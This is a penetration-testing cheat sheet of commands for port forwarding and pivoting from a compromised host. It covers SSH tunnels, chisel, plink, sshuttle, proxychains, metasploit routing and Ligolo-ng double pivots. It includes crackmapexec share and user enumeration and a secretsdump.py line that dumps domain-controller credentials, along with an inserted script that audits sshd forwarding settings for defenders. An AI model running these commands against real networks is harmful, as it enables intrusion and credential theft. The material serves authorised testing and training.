Port Forwarding and Proxying

Port Forwarding

SSH Tunneling/Local Port Forwarding

ssh user@<IP> -p port -L 8001:127.0.0.1:8080 -fN

SSH Remote Port Forwarding

ssh -R 5555:127.0.0.1:5555 -p2222 <user>@<IP>

Socat - Port Forward

./socat.exe TCP-LISTEN:8002,fork,reuseaddr TCP:127.0.0.1:8080

chisel - Remote Port Forward

-> Your machine

./chisel server -p <listen_port> --reverse &

-> Compromised Host

./chisel client <client_port>:<client_port> R:<local_port>:<target_IP>:<target_port> &

Chisel - Local Port Forward

-> Compromised Host

./chisel server -p <listen_port>

-> Your Machine

./chisel client <client_port>:<client_port> <local_port>:<target_IP>:<target_port>

plink - Remote Port Forward

cmd.exe /c echo y | plink.exe -ssh -l <user> -pw <password> -R 192.168.0.20:1234:127.0.0.1:3306 192.168.0.20

Proxying - Network Pivoting

sshuttle (Unix) - proxying

sshuttle -r user@<ip> --ssh-cmd "ssh -i private_key" 172.16.0.0/24

SSH + Proxychains commands

Add the line socks4 127.0.0.1 8080 to /etc/proxychains.conf (matching the -D port used below)

ssh -N -D 127.0.0.1:8080 <user>@<ip> -p 2222
proxychains ping <ip>
proxychains nc <ip> <port>
proxychains nmap -p <port> 192.168.0.0/24
proxychains crackmapexec smb -u <user> -p <password> <target> --shares
proxychains crackmapexec smb -u <user> -p <password> <dc-target> --users
proxychains crackmapexec smb -u <user> -p <password> <target> 
proxychains secretsdump.py -k -no-pass <dc> -just-dc-user '<domain>\<user>' -debug
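The SSH tunnels used above (-L, -R and the -D SOCKS proxy) only work where sshd permits them. The following audit script is an added example, not part of the original cheat sheet: it reads the effective configuration printed by `sshd -T` and reports every setting that still allows forwarding. The `sshd -T` output embedded below is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example: audit the sshd settings that make ssh -L / -R / -D tunnels
# possible. Input is `sshd -T` output (effective config, lowercase keys,
# one "key value" per line). The sample below is constructed, not captured.
SAMPLE_SSHD_T='port 22
allowtcpforwarding yes
gatewayports no
permittunnel no
allowstreamlocalforwarding yes
permitopen any
permitlisten any
disableforwarding no'

# finding KEY VALUE WHY: print one audit line for a risky setting.
finding() { printf 'FINDING: %s %s  (%s)\n' "$1" "$2" "$3"; }

# audit_ssh_forwarding: read `sshd -T` output on stdin, print one line per
# risky setting and return the number of findings (0 = no forwarding exposed).
# `DisableForwarding yes` overrides every other forwarding option in sshd.
audit_ssh_forwarding() {
    findings=0
    disable_all=no
    while read -r key value; do
        case "$key" in
            disableforwarding) disable_all=$value ;;
            allowtcpforwarding)          # yes/local/remote enable -L, -D and/or -R
                [ "$value" = no ] || { finding "$key" "$value" "ssh -L/-R/-D tunnels allowed"; findings=$((findings + 1)); } ;;
            gatewayports)                # yes/clientspecified let -R listeners bind non-loopback addresses
                [ "$value" = no ] || { finding "$key" "$value" "remote forwards may listen on external interfaces"; findings=$((findings + 1)); } ;;
            permittunnel)                # tun/tap device forwarding (ssh -w), a layer-3 tunnel
                [ "$value" = no ] || { finding "$key" "$value" "tun/tap tunnels (ssh -w) allowed"; findings=$((findings + 1)); } ;;
            allowstreamlocalforwarding)  # unix-socket forwarding
                [ "$value" = no ] || { finding "$key" "$value" "unix socket forwarding allowed"; findings=$((findings + 1)); } ;;
            permitopen|permitlisten)     # 'any' places no restriction on forwarded destinations/ports
                [ "$value" != any ] || { finding "$key" "$value" "no restriction on forwarded destinations or ports"; findings=$((findings + 1)); } ;;
        esac
    done
    if [ "$disable_all" = yes ]; then
        echo "OK: disableforwarding yes is set; it overrides the options above"
        return 0
    fi
    return "$findings"
}

# Demo on the constructed sample. On a real host: sshd -T | audit_ssh_forwarding
printf '%s\n' "$SAMPLE_SSHD_T" | audit_ssh_forwarding || echo "risky settings: $?"
```

The return value is the finding count, so the script can gate a configuration-management check; the constructed sample yields 4 findings.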

chisel - Reverse Proxy

-> Your Machine

./chisel server -p <listen_port> --reverse &

-> Compromised Host

./chisel client <target_IP>:<listen_port> R:socks &

chisel - Forward Proxy

-> Compromised Host

./chisel server -p <listen_port> --socks5

-> Your Machine

./chisel client <target_IP>:<listen_port> <proxy_port>:socks

metasploit - proxying

route add <ip>/24 1
route print
use auxiliary/server/socks_proxy
run

Ligolo-ng

-> Proxy

-> Agent

-> Installation

sudo apt install ligolo-ng

-> Proxy set up

sudo ip tuntap add user <Your Username> mode tun ligolo
sudo ip link set ligolo up

-> Start proxy

ligolo-proxy -h
ligolo-proxy -selfcert

-> Run the agent without ignoring certificates

./agent -connect attacker_server:11601

-> Agent set up

./agent -connect <Attack IP>:11601 -ignore-cert

-> Verify network interfaces

ifconfig

-> Add an entry to the routing table so Ligolo can route traffic through the tunnel and reach the target network

sudo ip route add <Internal_Network> dev ligolo
start    (in the ligolo-proxy console, once the agent session is selected)

Performing a Ligolo-ng Double Pivot

-> Add a second TUN interface

sudo ip tuntap add user kali mode tun ligolo-double
sudo ip link set ligolo-double up

-> Create a listener

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list

-> Connect to the proxy server

./agent.exe -connect <IP of First Pivot Point>:11601 -ignore-cert

-> Start a tunnel and add a route

sudo ip route add <New_Network> dev ligolo-double